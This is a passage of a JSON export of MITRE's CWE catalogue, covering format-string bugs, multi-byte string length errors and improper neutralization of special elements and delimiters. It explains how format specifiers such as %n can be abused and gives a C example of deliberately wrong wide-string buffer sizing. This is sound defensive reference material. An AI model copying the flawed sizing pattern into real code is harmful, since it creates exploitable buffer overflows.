ASCSM"},"Entry_ID":"ASCSM-CWE-134"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"67"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-116"}},{"attr":{"@_External_Reference_ID":"REF-117"}},{"attr":{"@_External_Reference_ID":"REF-118"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Format String Bugs&#34; Page 147"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 6: Format String Problems.&#34; Page 109"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C Format Strings&#34;, Page 422"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-134"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that support format strings."},{"attr":{"@_Type":"Other"},"xhtml:p":["While Format String vulnerabilities typically fall under the Buffer Overflow category, technically they are not overflowed buffers. The Format String vulnerability is fairly new (circa 1999) and stems from the fact that there is no realistic way for a function that takes a variable number of arguments to determine just how many arguments were passed in. The most common functions that take a variable number of arguments, including C-runtime functions, are the printf() family of calls. The Format String problem appears in a number of ways. A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program.","Frequently targeted entities are file names, process names, identifiers.","Format string problems are a classic C/C++ issue that are now rare due to the ease of discovery. One main reason format string vulnerabilities can be exploited is due to the %n operator. The %n operator will write the number of characters, which have been printed by the format string therefore far, to the memory pointed to by its argument. Through skilled creation of a format string, a malicious user may use values on the stack to create a write-what-where condition. Once this is achieved, they can execute arbitrary code. Other operators can be used as well; for example, a %9999s operator could also trigger a buffer overflow, or when used in file-formatting functions like fprintf, it can generate a much larger output than intended."]},{"#text":"Format string issues are under-studied for languages other than C. Memory or disk consumption, control flow or variable alteration, and data corruption may result from format string exploitation in applications written in other languages such as Perl, PHP, Python, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Modes_of_Introduction, Relationships, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Functional_Areas, Likelihood_of_Exploit, Other_Notes, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Format String","attr":{"@_Date":"2015-12-07"}}}},"135":{"attr":{"@_ID":"135","@_Name":"Incorrect Calculation of Multi-Byte String Length","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the length of strings that can contain wide or multi-byte characters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["There are several ways in which improper string length checking may result in an exploitable condition. All of these, however, involve the introduction of buffer overflow conditions in order to reach an exploitable state.","The first of these issues takes place when the output of a wide or multi-byte character string, string-length function is used as a size for the allocation of memory. While this will result in an output of the number of characters in the string, note that the characters are most likely not a single byte, as they are with standard character strings. So, using the size returned as the size sent to new or malloc and copying the string to this newly allocated memory will result in a buffer overflow.","Another common way these strings are misused involves the mixing of standard string and wide or multi-byte string functions on a single string. Invariably, this mismatched information will result in the creation of a possibly exploitable buffer overflow condition."]}}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"This weakness may lead to a buffer overflow. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Always verify the length of the string unit character."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use length computing functions (e.g. strlen, wcslen, etc.) appropriately with their equivalent type (e.g.: byte, wchar_t, etc.)"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example would be exploitable if any of the commented incorrect malloc calls were used.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;strings.h&gt;#include &lt;wchar.h&gt;int main() {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"wchar_t wideString[] = L\\"The spazzy orange tiger jumped \\" \\\\\\"over the tawny jaguar.\\";wchar_t *newString;printf(\\"Strlen() output: %d\\\\nWcslen() output: %d\\\\n\\",strlen(wideString), wcslen(wideString));/* Wrong because the number of chars in a string isn\'t related to its length in bytes //newString = (wchar_t *) malloc(strlen(wideString));*//* Wrong because wide characters aren\'t 1 byte long! //newString = (wchar_t *) malloc(wcslen(wideString));*//* Wrong because wcslen does not include the terminating null */newString = (wchar_t *) malloc(wcslen(wideString) * sizeof(wchar_t));/* correct! */newString = (wchar_t *) malloc((wcslen(wideString) + 1) * sizeof(wchar_t));/* ... */","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Strlen() output: 0Wcslen() output: 53","xhtml:br":""}}],"Body_Text":"The output from the printf() statement would be:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper string length checking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO10-J","Entry_Name":"Ensure the array is filled when using read() to fill an array"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Unicode and ANSI Buffer Size Mismatches&#34; Page 153"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Gregory Padgett","Contribution_Organization":"Unitrends","Contribution_Date":"2010-01-11","Contribution_Comment":"correction to Demonstrative_Example"},"Previous_Entry_Name":{"#text":"Improper String Length Checking","attr":{"@_Date":"2008-04-11"}}}},"138":{"attr":{"@_ID":"138","@_Name":"Improper Neutralization of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component.","Extended_Description":"Most languages and protocols have their own special elements such as characters and reserved words. These special elements can carry control implications. If software does not prevent external control or influence over the inclusion of such special elements, the control flow of the program may be altered from what was intended. For example, both Unix and Windows interpret the symbol &lt; (\\"less than\\") as meaning \\"read input from a file\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Developers should anticipate that special elements (e.g. delimiters, symbols) will be injected into input vectors of their software system. One defense is to create an allowlist (e.g. a regular expression) that defines valid input according to the requirements specifications. Strictly filter any input that does not match against the allowlist. Properly encode your output, and quote any elements that have special meaning to the component with which you are communicating."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Use and specify an appropriate output encoding to ensure that the special elements are well-defined. A normal byte sequence in one encoding could be a special element in another."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0677","Description":"Read arbitrary files from mail client by providing a special MIME header that is internally used to store pathnames for attachments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0677"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not cleanse special escape sequence before sending data to a mail program, causing the mail program to process those sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Elements (Characters or Reserved Words)"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Custom Special Character Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":[{"#text":"This weakness can be related to interpretation conflicts or interaction errors in intermediaries (such as proxies or application firewalls) when the intermediary\'s model of an endpoint does not account for protocol-specific special elements.","attr":{"@_Type":"Relationship"}},{"#text":"See this entry\'s children for different types of special elements that have been observed at one point or another. However, it can be difficult to find suitable CVE examples. In an attempt to be complete, CWE includes some types that do not have any associated observed example.","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is probably under-studied for proprietary or custom formats. It is likely that these issues are fairly common in applications that use their own custom format for configuration files, logs, meta-data, messaging, etc. They would only be found by accident or with a focused effort based on an understanding of the format.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Description, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Special Elements (Characters or Reserved Words)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Elements","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"140":{"attr":{"@_ID":"140","@_Name":"Improper Neutralization of Delimiters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes delimiters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter Problems"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter Problems","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Delimiters","attr":{"@_Date":"2010-06-21"}}]}},"141":{"attr":{"@_ID":"141","@_Name":"Improper Neutralization of Parameter/Argument Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that parameter/argument delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0307","Description":"Attacker inserts field separator into input to specify admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;IFS&#34;, Page 604"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, 